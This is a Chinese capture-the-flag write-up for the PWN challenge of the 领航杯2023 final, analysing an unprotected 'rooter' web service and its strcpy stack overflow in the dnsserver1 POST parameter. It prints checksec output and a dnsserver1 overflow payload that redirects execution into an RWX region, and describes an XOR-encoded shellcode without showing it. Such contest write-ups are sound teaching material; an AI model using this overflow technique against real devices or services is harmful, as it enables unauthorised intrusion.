-
-
领航杯2023决赛PWN题解
-
发表于:
2023-9-5 21:42
10933
-
众所周知,领航杯是萌新友好、难度极低的CTF竞赛。领航杯2023决赛采用AWD赛制,依次包含白盒、黑盒和PWN共3题。本文为第3题题解。
登录容器,检查进程。结果如下。
打包/app
,下载备份。结构如下。
其中,login.html
和lucke.html
为静态网页。如图。
rooter
为服务程序。检查保护。结果如下。
不难发现没有保护。
rooter.py
为守护脚本。脚本内部包含大量提示。通过脚本提示可知端口为8008
,漏洞页面为WanStaticIp.html
,请求方法为POST
,参数包括ipaddr
和dnsserver2
等。这些可以在服务程序分析中进一步确认。
按照题目描述,flag
位于/flag
中,格式为cnhongke{^[0-9a-f]{32}$}
。
使用Relyze
分析rooter
。通过题目环境分析定位关键位置WanStaticIp_rpm
。如图。
不难发现使用strcpy_2
向dnsserver1
或dnsserver2
复制时可能覆盖返回地址。如图。
进一步观察global_block
。通过查找交叉引用定位关键位置init_dispatcher
。如图。
发现其基址为0x0233C000
,且具有RWX
权限。
一种可能dnsserver1
载荷如下。
其中,结尾的%70%C0%33%02
代表覆盖返回地址为0x0233C070
。
同时,相应ipaddr
载荷如下。
上述载荷反汇编如下。
上述载荷中采用了异或,这是因为载荷中不能出现%00
('\0'
)和%26
('&'
)等。
简单使用curl
请求,即可得到flag
。如图。
题目真的非常简单,仅供娱乐。但是如此简单的竞赛我们取得了倒数的成绩,简直奇耻大辱。附件如下。
python
/
app
/
rooter.py
sh
-
c
/
app
/
rooter
/
app
/
rooter
python
/
app
/
rooter.py
sh
-
c
/
app
/
rooter
/
app
/
rooter
/
app
/
├── login.html
├── lucke.html
├── rooter
└── rooter.py
0
directories,
4
files
/
app
/
├── login.html
├── lucke.html
├── rooter
└── rooter.py
0
directories,
4
files
[
*
]
'/app/rooter'
Arch: amd64
-
64
-
little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (
0x400000
)
RWX: Has RWX segments
[
*
]
'/app/rooter'
Arch: amd64
-
64
-
little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (
0x400000
)
RWX: Has RWX segments
dnsserver1
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
%
70
%
C0
%
33
%
02
dnsserver1
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
%
70
%
C0
%
33
%
02
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!